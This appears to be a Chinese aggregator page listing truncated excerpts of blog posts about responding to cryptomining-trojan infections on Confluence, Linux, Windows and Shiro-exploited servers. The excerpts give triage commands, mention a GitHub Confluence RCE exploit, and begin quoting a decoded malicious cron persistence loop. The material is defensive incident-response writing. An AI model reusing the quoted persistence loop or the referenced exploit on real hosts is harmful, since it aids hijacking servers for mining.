原文:confluence 挖礦木馬應急響應

最近遇到一台confluence wiki主機被挖礦,收到CPU 告警異常之后,登錄查看,進行分析。 top c 命令查看,果然CPU 已經資源已經被吃完了。。 看到用戶是confluence, 的肯定是confluence的RCE漏洞導致的,因為大部門的使用這個軟件的都是破解版本,官方的補丁都是針對付費用戶的。 具體漏洞細節: https: github.com jas n CVE 漏洞利用R ...

2019-09-05 11:40 0 745 推薦指數:

查看詳情

挖礦木馬應急響應

挖礦木馬簡介 隨着區塊鏈的火爆,各種虛擬貨幣的行情一路走高,不乏有人像炒房炒股一樣,通過包括大名鼎鼎的比特幣在內的各種虛擬貨幣發家致富,讓人眼饞。在這種情況下,黑客怎么會放過這么賺錢的機會呢。大家都知道,獲取虛擬貨幣除了買賣還有就挖礦挖礦其實是通過計算機做一些復雜的運算去算出還沒有歸屬 ...

Mon Jun 04 03:22:00 CST 2018 0 1212
應急響應-挖礦問題

場景 ​ 有客戶反饋其所使用的服務器近期突然網站打開特別慢,但是網站訪問人數較前期並無明顯變化,服務器CPU利用率較高。同時客戶接到投訴反映通過搜索引擎搜索該網站點擊后會跳轉到博彩網站。請協助客戶分 ...

Tue Jan 26 07:32:00 CST 2021 1 631
Window應急響應(四):挖礦病毒

0x00 前言 ​ 隨着虛擬貨幣的瘋狂炒作,挖礦病毒已經成為不法分子利用最為頻繁的攻擊方式之一。病毒傳播者可以利用個人電腦或服務器進行挖礦,具體現象為電腦CPU占用率高,C盤可使用空間驟降,電腦溫度升高,風扇噪聲增大等問題。 0x01 應急場景 ​ 某天上午重啟服務器的時候,發現程序啟動很慢 ...

Sun Aug 05 23:17:00 CST 2018 0 16001
Linux應急響應(三):挖礦病毒

0x00 前言 ​ 隨着虛擬貨幣的瘋狂炒作,利用挖礦腳本來實現流量變現,使得挖礦病毒成為不法分子利用最為頻繁的攻擊方式。新的挖礦攻擊展現出了類似蠕蟲的行為,並結合了高級攻擊技術,以增加對目標服務器感染的成功率,通過利用永恆之藍(EternalBlue)、web攻擊多種漏洞(如Tomcat弱 ...

Mon Oct 08 06:42:00 CST 2018 0 876
記一次linux挖礦木馬應急

1.拿到了一個靶機,top檢查,發現有一個進程CPU利用率一直在百分之百,經過特征對比,發現是挖礦木馬 2.利用 ll /proc/端口ID/exe 定位木馬文件所在位置 3.rm -rf 刪除掉木馬文件 4.原本以為搞定了,過了一會發現還是有利用率百分之百情況 5.查看 cat ...

Fri Aug 16 16:19:00 CST 2019 0 523
應急響應--記錄一次漏洞緊急處理中意外發現的挖礦木馬(Shiro反序列化漏洞和ddg挖礦木馬

背景 某公司線上服務器意外發現一個Apache Shiro 反序列化漏洞,可以直接GetShell。出於做安全的謹慎,馬上出現場應急,確認漏洞。該漏洞存在在cookie字段中的rememberMe字段中,可以RCE 漏洞應急 來到現場后,發現已經升級了,漏洞確認修復完成,只能查看以前 ...

Mon Jul 02 10:23:00 CST 2018 0 1274
confluence占用cpu100%,挖礦木馬

1發現cpu占用很高,confluence用戶啟動了很多進程 2查看定時任務 crontab -l -u confluence 解析處理base64 ( while : ; do sleep 5 ; if ! kill -0 26154 >/dev ...

Tue Dec 31 04:32:00 CST 2019 1 1189
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM